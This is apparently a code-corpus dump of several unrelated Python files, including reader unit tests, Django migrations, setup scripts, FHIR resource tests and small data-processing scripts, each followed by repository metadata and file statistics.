self.assertEqual(C.psize, len(C.pt))
def test_number_of_vertex_elements_in_MESH_chunk(self):
"""Test that compares declared an found vertices in MESH chunks"""
for O in self.mod.objts.itervalues():
for M in O.meshes.itervalues():
self.assertEqual(M.vsize, len(M.vert))
def test_number_of_list_elements_in_MESH_chunk(self):
"""Test that compares declared an found indices in MESH chunks"""
for O in self.mod.objts.itervalues():
for M in O.meshes.itervalues():
self.assertEqual(M.lsize, len(M.list))
class TestReaders_segreader(unittest.TestCase):
def setUp(self):
self.seg_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.seg')
def test_get_data(self):
"""Test the main entry point: get_data(...)"""
seg = segreader.get_data(self.seg_file)
print(seg, file=sys.stderr)
self.assertIsInstance(seg, segreader.SeggerSegmentation)
self.assertEqual(seg.map_level, 0.852)
self.assertEqual(seg.format_version, 2)
self.assertItemsEqual(seg.map_size, [26, 27, 30])
self.assertEqual(seg.format, 'segger')
self.assertEqual(seg.mask.shape, (30, 27, 26))
class TestReaders_stlreader(unittest.TestCase):
def setUp(self):
self.stl_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.stl')
self.stl_bin_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data_binary.stl')
self.stl_multi_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data_multiple.stl')
def test_get_data(self):
"""Test the main entry point: get_data(...)"""
meshes = stlreader.get_data(self.stl_file) # only one mesh here
name, vertices, polygons = meshes[0]
num_vertices = len(vertices)
a, b, c = zip(*polygons.values())
vertex_ids = set(a + b + c)
self.assertEqual(name, "{}#{}".format(os.path.basename(self.stl_file), 0))
self.assertGreaterEqual(num_vertices, 1)
self.assertEqual(min(vertex_ids), min(vertices.keys()))
self.assertEqual(max(vertex_ids), max(vertices.keys()))
self.assertEqual(sum(set(vertex_ids)), sum(vertices.keys()))
self.assertEqual(set(vertex_ids), set(vertices.keys()))
def test_read_binary(self):
"""Test that we can read a binary STL file"""
meshes = stlreader.get_data(self.stl_bin_file)
print(meshes[0][0], file=sys.stderr)
name, vertices, polygons = meshes[0]
self.assertEqual(name, "{}#{}".format(os.path.basename(self.stl_bin_file), 0))
self.assertTrue(len(vertices) > 0)
self.assertTrue(len(polygons) > 0)
polygon_ids = list()
for a, b, c in polygons.itervalues():
polygon_ids += [a, b, c]
self.assertItemsEqual(set(vertices.keys()), set(polygon_ids))
def test_read_multiple(self):
"""Test that we can read a multi-solid STL file
Only works for ASCII by concatenation"""
meshes = stlreader.get_data(self.stl_multi_file)
for name, vertices, polygons in meshes:
self.assertEqual(name, "{}#{}".format(os.path.basename(self.stl_multi_file), 0))
self.assertTrue(len(vertices) > 0)
self.assertTrue(len(polygons) > 0)
polygon_ids = list()
for a, b, c in polygons.itervalues():
polygon_ids += [a, b, c]
self.assertItemsEqual(set(vertices.keys()), set(polygon_ids))
class TestReaders_surfreader(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.surf_file = os.path.join(tests.TEST_DATA_PATH, 'segmentations', 'test_data.surf')
cls.header, cls.segments = surfreader.get_data(cls.surf_file) # only one mesh here
def test_get_data(self):
"""Test the main entry point: get_data(...)"""
name = self.segments[2].name
vertices = self.segments[2].vertices
triangles = self.segments[2].triangles
num_vertices = len(vertices)
a, b, c = zip(*triangles)
vertex_ids = set(a + b + c)
self.assertIsInstance(self.header, ahds.header.AmiraHeader)
self.assertIsInstance(self.segments, dict)
self.assertEqual(name, 'medulla_r')
self.assertGreaterEqual(num_vertices, 1)
self.assertGreaterEqual(len(self.segments), 1)
self.assertEqual(min(vertex_ids), min(vertices.keys()))
self.assertEqual(max(vertex_ids), max(vertices.keys()))
self.assertEqual(sum(set(vertex_ids)), sum(vertices.keys()))
self.assertEqual(set(vertex_ids), set(vertices.keys()))
if __name__ == "__main__":
unittest.main()
| 41.4 | 118 | 0.649957 | 2,293 | 17,595 | 4.792412 | 0.16703 | 0.029939 | 0.028392 | 0.023205 | 0.515152 | 0.40495 | 0.351078 | 0.324688 | 0.29757 | 0.27937 | 0 | 0.012511 | 0.227735 | 17,595 | 424 | 119 | 41.497642 | 0.796217 | 0.114237 | 0 | 0.280255 | 0 | 0 | 0.050856 | 0.007554 | 0 | 0 | 0 | 0 | 0.461783 | 1 | 0.143312 | false | 0.028662 | 0.035032 | 0 | 0.197452 | 0.009554 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e17a9538e76246ed04d8a1eda0d6ac18d6b1fa0 | 1,801 | py | Python | logging/google/cloud/logging/_helpers.py | rodrigodias27/google-cloud-python | 7d1161f70744c0dbbe67a3f472ea95667eaafe50 | [
"Apache-2.0"
] | 1 | 2017-05-18T06:58:48.000Z | 2017-05-18T06:58:48.000Z | logging/google/cloud/logging/_helpers.py | rodrigodias27/google-cloud-python | 7d1161f70744c0dbbe67a3f472ea95667eaafe50 | [
"Apache-2.0"
] | null | null | null | logging/google/cloud/logging/_helpers.py | rodrigodias27/google-cloud-python | 7d1161f70744c0dbbe67a3f472ea95667eaafe50 | [
"Apache-2.0"
] | 1 | 2022-03-24T01:37:10.000Z | 2022-03-24T01:37:10.000Z | # Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common logging helpers."""
from google.cloud.logging.entries import ProtobufEntry
from google.cloud.logging.entries import StructEntry
from google.cloud.logging.entries import TextEntry
def entry_from_resource(resource, client, loggers):
"""Detect correct entry type from resource and instantiate.
:type resource: dict
:param resource: One entry resource from API response.
:type client: :class:`~google.cloud.logging.client.Client`
:param client: Client that owns the log entry.
:type loggers: dict
:param loggers:
A mapping of logger fullnames -> loggers. If the logger
that owns the entry is not in ``loggers``, the entry
will have a newly-created logger.
:rtype: :class:`~google.cloud.logging.entries._BaseEntry`
:returns: The entry instance, constructed via the resource
"""
if 'textPayload' in resource:
return TextEntry.from_api_repr(resource, client, loggers)
elif 'jsonPayload' in resource:
return StructEntry.from_api_repr(resource, client, loggers)
elif 'protoPayload' in resource:
return ProtobufEntry.from_api_repr(resource, client, loggers)
raise ValueError('Cannot parse log entry resource.')
| 36.755102 | 74 | 0.735702 | 244 | 1,801 | 5.393443 | 0.471311 | 0.045593 | 0.068389 | 0.075988 | 0.158815 | 0.158815 | 0.054711 | 0 | 0 | 0 | 0 | 0.005453 | 0.185453 | 1,801 | 48 | 75 | 37.520833 | 0.891616 | 0.624653 | 0 | 0 | 0 | 0 | 0.109272 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.272727 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
8e1e583f80ca97e7424a25ea64300d82b7ad3565 | 2,090 | py | Python | pydatacube/pcaxis/__init__.py | jampekka/pydatacube | 6999db7ae12d60089904081b47fbddd0cbf9e371 | [
"MIT"
] | 1 | 2016-04-03T10:01:04.000Z | 2016-04-03T10:01:04.000Z | pydatacube/pcaxis/__init__.py | jampekka/pydatacube | 6999db7ae12d60089904081b47fbddd0cbf9e371 | [
"MIT"
] | null | null | null | pydatacube/pcaxis/__init__.py | jampekka/pydatacube | 6999db7ae12d60089904081b47fbddd0cbf9e371 | [
"MIT"
] | 2 | 2015-02-25T08:49:01.000Z | 2018-10-19T23:57:47.000Z | # encoding: utf-8
from collections import OrderedDict
import string
from pydatacube.pydatacube import _DataCube
import px_reader
# A bit scandinavian specific
default_translate = dict(zip(
u"äöä -",
u"aoa__"
))
class Sluger(object):
def __init__(self, translate=default_translate):
self.given_out = {}
self.translate = translate
def __call__(self, value):
slug = value.lower()
chars = []
for c in slug:
c = self.translate.get(c, c)
if c == '_':
chars.append(c)
if c.isalnum():
chars.append(c)
slug = ''.join(chars)
slug = slug.encode('ascii', errors='ignore')
realslug = slug
# Hopefully won't happen
while realslug in self.given_out:
realslug = realslug + '_'
return realslug
PxSyntaxError = px_reader.PxSyntaxError
def to_cube(pcaxis_data, origin_url=None, Sluger=Sluger):
px = px_reader.Px(pcaxis_data)
cube = OrderedDict()
metadata = OrderedDict()
def setmeta(target, src):
if not hasattr(px, src):
return
metadata[target] = getattr(px, src)
setmeta('title', 'title')
setmeta('source', 'source')
if origin_url:
metadata['origin_url'] = origin_url
if hasattr(px, 'last-updated'):
metadata['updated'] = getattr(px, 'updated_dt').isoformat()
setmeta('note', 'note')
cube['metadata'] = metadata
if hasattr(px, 'codes'):
codes = px.codes
else:
codes = {}
dimensions = []
dim_sluger = Sluger()
for label, px_categories in px.values.iteritems():
if label in px.codes:
cat_ids = codes[label]
else:
cat_sluger = Sluger()
cat_ids = [cat_sluger(c) for c in px_categories]
categories = []
for cat_id, cat_label in zip(cat_ids, px_categories):
cat = dict(id=cat_id, label=cat_label)
categories.append(cat)
dimension = dict(
id=dim_sluger(label),
label=label,
categories=categories
)
dimensions.append(dimension)
cube['dimensions'] = dimensions
# TODO: Casting?
# TODO: Add a public method to get raw
# data from a Px-object
values = px._data.split()
cube['value_dimensions'] = [
dict(id=dim_sluger('value'), values=values)
]
return _DataCube(cube)
| 22 | 61 | 0.686124 | 284 | 2,090 | 4.887324 | 0.338028 | 0.025937 | 0.017291 | 0.021614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000585 | 0.181818 | 2,090 | 94 | 62 | 22.234043 | 0.811111 | 0.066986 | 0 | 0.055556 | 0 | 0 | 0.070031 | 0 | 0 | 0 | 0 | 0.010638 | 0 | 1 | 0.055556 | false | 0 | 0.055556 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e204483fe351d8b8c3d7163c557940ac5a53c2d | 951 | py | Python | socketio/web.py | falleco/sample-websockets | ad600c4531fd2120b1424b459ad80697d723e435 | [
"MIT"
] | null | null | null | socketio/web.py | falleco/sample-websockets | ad600c4531fd2120b1424b459ad80697d723e435 | [
"MIT"
] | null | null | null | socketio/web.py | falleco/sample-websockets | ad600c4531fd2120b1424b459ad80697d723e435 | [
"MIT"
] | null | null | null | # import sys
# sys.path.insert(0, "lib/gevent-0.13.8")
# sys.path.insert(0, "lib/bottle")
# sys.path.insert(0, "lib/gevent-socketio")
from gevent import monkey
monkey.patch_all()
#
from socketio import socketio_manage, mixins
from socketio.namespace import BaseNamespace
from bottle import route, run, view, request, static_file
class HeartBeatNamespace(BaseNamespace, mixins.BroadcastMixin):
def on_beat(self, msg):
print "On beat!"
self.broadcast_event("pulse", "")
@route('/')
@view("index")
def index():
return {}
@route("/static/<file:path>")
def static(file):
return static_file(file, root="static")
@route('/socket.io/<remaining:path>')
def socketio_service(remaining):
context = {'/beat': HeartBeatNamespace}
socketio_manage(request.environ, context, request)
if __name__ == "__main__":
run(host='localhost', port=8080, debug=True, reloader=True, server="geventSocketIO", resource="socket.io") | 25.702703 | 110 | 0.710831 | 122 | 951 | 5.409836 | 0.483607 | 0.060606 | 0.059091 | 0.063636 | 0.095455 | 0.069697 | 0 | 0 | 0 | 0 | 0 | 0.01335 | 0.133544 | 951 | 37 | 110 | 25.702703 | 0.787621 | 0.131441 | 0 | 0 | 0 | 0 | 0.141291 | 0.032887 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.181818 | null | null | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e2063365732693edaa9ba388b9fb75a35d453c0 | 633 | py | Python | imagesave.py | aasthabhat/Alzheimer-s-Disease-Prediction | 0e60fa35ef81bc9241706ee0c0f12a9683071181 | [
"MIT"
] | null | null | null | imagesave.py | aasthabhat/Alzheimer-s-Disease-Prediction | 0e60fa35ef81bc9241706ee0c0f12a9683071181 | [
"MIT"
] | null | null | null | imagesave.py | aasthabhat/Alzheimer-s-Disease-Prediction | 0e60fa35ef81bc9241706ee0c0f12a9683071181 | [
"MIT"
] | 1 | 2019-10-05T18:52:10.000Z | 2019-10-05T18:52:10.000Z | import os
import numpy as np
import nibabel as nib
import matplotlib.pyplot as plt
import scipy.misc
import glob
from sklearn.cluster import KMeans
import cv2 as cv
#Save the 92 index slices out of 256 2D slices of the 3D MRI image
basepath = 'C:/Users/aasth/Desktop/adni dataset'
outpath = 'C:/Users/aasth/Desktop/adni dataset/final'
os.chdir(basepath)
i=1
for entry in glob.glob('*.hdr'):
image_array= nib.load(entry).get_data()
data=np.rot90(image_array[:, 92,:,0])
image_name='adni'+ str(i) +'.png'
final = os.path.join(outpath, image_name)
scipy.misc.imsave(final, data)
i =i+1
| 26.375 | 67 | 0.693523 | 105 | 633 | 4.133333 | 0.561905 | 0.041475 | 0.050691 | 0.082949 | 0.133641 | 0.133641 | 0 | 0 | 0 | 0 | 0 | 0.02924 | 0.189573 | 633 | 23 | 68 | 27.521739 | 0.816764 | 0.102686 | 0 | 0 | 0 | 0 | 0.163904 | 0.099448 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.421053 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
8e257db2202e7ae23d7e1ad381d19796e4ee9743 | 408 | py | Python | setup.py | gunnchadwick/backtrace-python | f2a735857fd76de1e568301856a9292059689878 | [
"MIT"
] | 3 | 2017-01-05T02:25:19.000Z | 2017-08-01T14:48:08.000Z | setup.py | gunnchadwick/backtrace-python | f2a735857fd76de1e568301856a9292059689878 | [
"MIT"
] | 10 | 2016-11-30T19:54:05.000Z | 2022-01-31T16:10:07.000Z | setup.py | gunnchadwick/backtrace-python | f2a735857fd76de1e568301856a9292059689878 | [
"MIT"
] | 1 | 2021-01-03T08:52:40.000Z | 2021-01-03T08:52:40.000Z | #!/usr/bin/env python
from setuptools import setup
import backtracepython
setup(
name='backtracepython',
version=backtracepython.version_string,
description='Backtrace error reporting tool for Python',
author='Andrew Kelley',
author_email='akelley@backtrace.io',
packages=['backtracepython'],
test_suite="tests",
url='https://github.com/backtrace-labs/backtrace-python',
)
| 24 | 61 | 0.732843 | 45 | 408 | 6.577778 | 0.733333 | 0.148649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144608 | 408 | 16 | 62 | 25.5 | 0.848138 | 0.04902 | 0 | 0 | 0 | 0 | 0.410853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e2f53b44bbb5fca0d567eb53e2abb0c303b2263 | 550 | py | Python | neat-python-read-only/setup.py | anuragpapineni/Hearthbreaker-evolved-agent | d519d42babd93e3567000c33a381e93db065301c | [
"MIT"
] | null | null | null | neat-python-read-only/setup.py | anuragpapineni/Hearthbreaker-evolved-agent | d519d42babd93e3567000c33a381e93db065301c | [
"MIT"
] | null | null | null | neat-python-read-only/setup.py | anuragpapineni/Hearthbreaker-evolved-agent | d519d42babd93e3567000c33a381e93db065301c | [
"MIT"
] | null | null | null | # Installation script
from distutils.core import setup, Extension
setup(
name='neat-python',
version='0.1',
description='A NEAT (NeuroEvolution of Augmenting Topologies) implementation',
packages=['neat', 'neat/iznn', 'neat/nn', 'neat/ctrnn', 'neat/ifnn'],
#ext_modules=[
# Extension('neat/iznn/iznn_cpp', ['neat/iznn/iznn.cpp']),
# Extension('neat/nn/ann', ['neat/nn/nn_cpp/ANN.cpp', 'neat/nn/nn_cpp/PyANN.cpp']),
# Extension('neat/ifnn/ifnn_cpp', ['neat/ifnn/ifnn.cpp']),],
)
| 42.307692 | 97 | 0.616364 | 69 | 550 | 4.84058 | 0.449275 | 0.071856 | 0.071856 | 0.08982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004515 | 0.194545 | 550 | 12 | 98 | 45.833333 | 0.749436 | 0.461818 | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e32af04333e07380c6816c822c35084a3b4f59b | 583 | py | Python | study/curso-em-video/exercises/056.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | study/curso-em-video/exercises/056.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | study/curso-em-video/exercises/056.py | jhonatanmaia/python | d53c64e6bab598c7e85813fd3f107c6f23c1fc46 | [
"MIT"
] | null | null | null | soma_idade=0
media_Idade=0
maior_idade_homem=0
nome_velho=''
tot_mulher_20=0
for i in range(0,4):
nome=str(input('Nome: ')).strip()
idade=int(input('Idade: '))
sexo=str(input('Sexo: ')).strip()
soma_idade+=idade
if i==1 and sexo in 'Mm':
maior_idade_homem=idade
nome_velho=nome
elif sexo in 'Mm' and idade>maior_idade_homem:
maior_idade_homem=idade
nome_velho=nome
if sexo in 'Ff' and idade <20:
tot_mulher_20+=1
media_Idade=soma_idade/4
print(media_Idade)
print(maior_idade_homem,nome_velho)
print(tot_mulher_20()) | 26.5 | 50 | 0.684391 | 98 | 583 | 3.806122 | 0.285714 | 0.134048 | 0.201072 | 0.107239 | 0.176944 | 0.176944 | 0.176944 | 0 | 0 | 0 | 0 | 0.036017 | 0.190395 | 583 | 22 | 51 | 26.5 | 0.754237 | 0 | 0 | 0.181818 | 0 | 0 | 0.042808 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.136364 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e35eae710a8b76331f1d686a7885d235eff3bd9 | 408 | py | Python | shotify/imgrepo/migrations/0003_alter_image_image_src.py | moeamadou753/shopify-fall-2021 | 16d91fc6bdfbfc45bede5867dfdf3c9620bb03c7 | [
"MIT"
] | null | null | null | shotify/imgrepo/migrations/0003_alter_image_image_src.py | moeamadou753/shopify-fall-2021 | 16d91fc6bdfbfc45bede5867dfdf3c9620bb03c7 | [
"MIT"
] | null | null | null | shotify/imgrepo/migrations/0003_alter_image_image_src.py | moeamadou753/shopify-fall-2021 | 16d91fc6bdfbfc45bede5867dfdf3c9620bb03c7 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.2 on 2021-05-10 04:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('imgrepo', '0002_auto_20210509_2317'),
]
operations = [
migrations.AlterField(
model_name='image',
name='image_src',
field=models.ImageField(upload_to='static/media/images/'),
),
]
| 21.473684 | 70 | 0.607843 | 45 | 408 | 5.377778 | 0.822222 | 0.07438 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104377 | 0.272059 | 408 | 18 | 71 | 22.666667 | 0.710438 | 0.110294 | 0 | 0 | 1 | 0 | 0.177285 | 0.063712 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e384904539153730293d550a277564d6b2e9cc9 | 865 | py | Python | shrike-examples/tests/test_pipelines.py | lynochka/azure-ml-problem-sets | e7e69de763444c5603e4455e35e69e917081a4cc | [
"MIT"
] | 3 | 2021-07-27T16:28:51.000Z | 2021-11-15T18:29:02.000Z | shrike-examples/tests/test_pipelines.py | lynochka/azure-ml-problem-sets | e7e69de763444c5603e4455e35e69e917081a4cc | [
"MIT"
] | null | null | null | shrike-examples/tests/test_pipelines.py | lynochka/azure-ml-problem-sets | e7e69de763444c5603e4455e35e69e917081a4cc | [
"MIT"
] | 7 | 2021-08-09T15:04:03.000Z | 2022-03-09T05:48:56.000Z | """
PyTest suite for testing all runnable pipelines.
"""
import sys
from unittest.mock import patch
# To-Do: import your pipeline class
### Pipeline validation tests (integration tests)
def test_demo_subgraph_build_local(pipeline_config_path="pipelines/config"):
""" Tests the subgraph demo graph by running the main function itself (which does .validate()) """
testargs = [
"prog",
"--config-dir",
pipeline_config_path,
"--config-name",
"experiments/<YourExperimentConfigFile>", # To-Do: point to the right config file
"module_loader.use_local='<ComponentKey>'", # To-Do: make sure the local version is used for ALL components - '*' could be helpful here
]
# will do everything except submit :)
with patch.object(sys, "argv", testargs):
# To-Do: call the main method of your pipeline
| 34.6 | 143 | 0.684393 | 110 | 865 | 5.290909 | 0.654545 | 0.027491 | 0.061856 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209249 | 865 | 24 | 144 | 36.041667 | 0.850877 | 0.332948 | 0 | 0 | 0 | 0 | 0.306763 | 0.188406 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e3a21a413a7266a07a6dd162f70fc95c0ea081b | 597 | py | Python | apps/home/migrations/0004_results.py | gwhong917/A_C_C | 1cd75a2e439f86bcbf1e6d9e1ac454f7dd276540 | [
"MIT"
] | null | null | null | apps/home/migrations/0004_results.py | gwhong917/A_C_C | 1cd75a2e439f86bcbf1e6d9e1ac454f7dd276540 | [
"MIT"
] | null | null | null | apps/home/migrations/0004_results.py | gwhong917/A_C_C | 1cd75a2e439f86bcbf1e6d9e1ac454f7dd276540 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.3 on 2022-02-28 16:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0003_auto_20220228_1112'),
]
operations = [
migrations.CreateModel(
name='Results',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('recepts_num', models.IntegerField(db_column='recept_num')),
('judge', models.IntegerField(db_column='judge')),
],
),
]
| 27.136364 | 114 | 0.58459 | 62 | 597 | 5.467742 | 0.709677 | 0.106195 | 0.117994 | 0.153392 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072261 | 0.281407 | 597 | 21 | 115 | 28.428571 | 0.717949 | 0.075377 | 0 | 0 | 1 | 0 | 0.125455 | 0.041818 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e3e4c944fc3b4410a8579c18786cca183d9b56e | 3,514 | py | Python | fhir/resources/tests/test_terminologycapabilities.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/tests/test_terminologycapabilities.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | fhir/resources/tests/test_terminologycapabilities.py | mmabey/fhir.resources | cc73718e9762c04726cd7de240c8f2dd5313cbe1 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/TerminologyCapabilities
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
import io
import json
import os
import unittest
import pytest
from .. import terminologycapabilities
from ..fhirdate import FHIRDate
from .fixtures import force_bytes
@pytest.mark.usefixtures("base_settings")
class TerminologyCapabilitiesTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
js = json.load(handle)
self.assertEqual("TerminologyCapabilities", js["resourceType"])
return terminologycapabilities.TerminologyCapabilities(js)
def testTerminologyCapabilities1(self):
inst = self.instantiate_from("terminologycapabilities-example.json")
self.assertIsNotNone(
inst, "Must have instantiated a TerminologyCapabilities instance"
)
self.implTerminologyCapabilities1(inst)
js = inst.as_json()
self.assertEqual("TerminologyCapabilities", js["resourceType"])
inst2 = terminologycapabilities.TerminologyCapabilities(js)
self.implTerminologyCapabilities1(inst2)
def implTerminologyCapabilities1(self, inst):
self.assertEqual(force_bytes(inst.codeSearch), force_bytes("explicit"))
self.assertEqual(
force_bytes(inst.contact[0].name), force_bytes("System Administrator")
)
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].system), force_bytes("email")
)
self.assertEqual(
force_bytes(inst.contact[0].telecom[0].value), force_bytes("wile@acme.org")
)
self.assertEqual(inst.date.date, FHIRDate("2012-01-04").date)
self.assertEqual(inst.date.as_json(), "2012-01-04")
self.assertEqual(
force_bytes(inst.description),
force_bytes(
"This is the FHIR capability statement for the main EHR at ACME for the private interface - it does not describe the public interface"
),
)
self.assertTrue(inst.experimental)
self.assertEqual(force_bytes(inst.id), force_bytes("example"))
self.assertEqual(
force_bytes(inst.implementation.description),
force_bytes("Acme Terminology Server"),
)
self.assertEqual(
force_bytes(inst.implementation.url), force_bytes("http://example.org/tx")
)
self.assertEqual(force_bytes(inst.kind), force_bytes("instance"))
self.assertEqual(force_bytes(inst.name), force_bytes("ACME-EHR"))
self.assertEqual(force_bytes(inst.publisher), force_bytes("ACME Corporation"))
self.assertEqual(force_bytes(inst.software.name), force_bytes("TxServer"))
self.assertEqual(force_bytes(inst.software.version), force_bytes("0.1.2"))
self.assertEqual(force_bytes(inst.status), force_bytes("draft"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
self.assertEqual(
force_bytes(inst.title), force_bytes("ACME EHR capability statement")
)
self.assertEqual(
force_bytes(inst.url),
force_bytes("urn:uuid:68D043B5-9ECF-4559-A57A-396E0D452311"),
)
self.assertEqual(force_bytes(inst.version), force_bytes("20130510"))
| 40.860465 | 150 | 0.678714 | 385 | 3,514 | 6.080519 | 0.353247 | 0.158052 | 0.15378 | 0.192226 | 0.303289 | 0.122597 | 0.05425 | 0.038445 | 0.038445 | 0 | 0 | 0.034335 | 0.204326 | 3,514 | 85 | 151 | 41.341176 | 0.802933 | 0.053216 | 0 | 0.144928 | 0 | 0.014493 | 0.178668 | 0.051522 | 0 | 0 | 0 | 0 | 0.347826 | 1 | 0.043478 | false | 0 | 0.115942 | 0 | 0.188406 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8e3fa716520a8c4514b44001a704b29ff37a613f | 1,332 | py | Python | omstools/RNAseq/general/expression_table_tools.py | bioShaun/OM004script | d604b565ae220f2ec7bfba7a8ef44018e7a33c12 | [
"MIT"
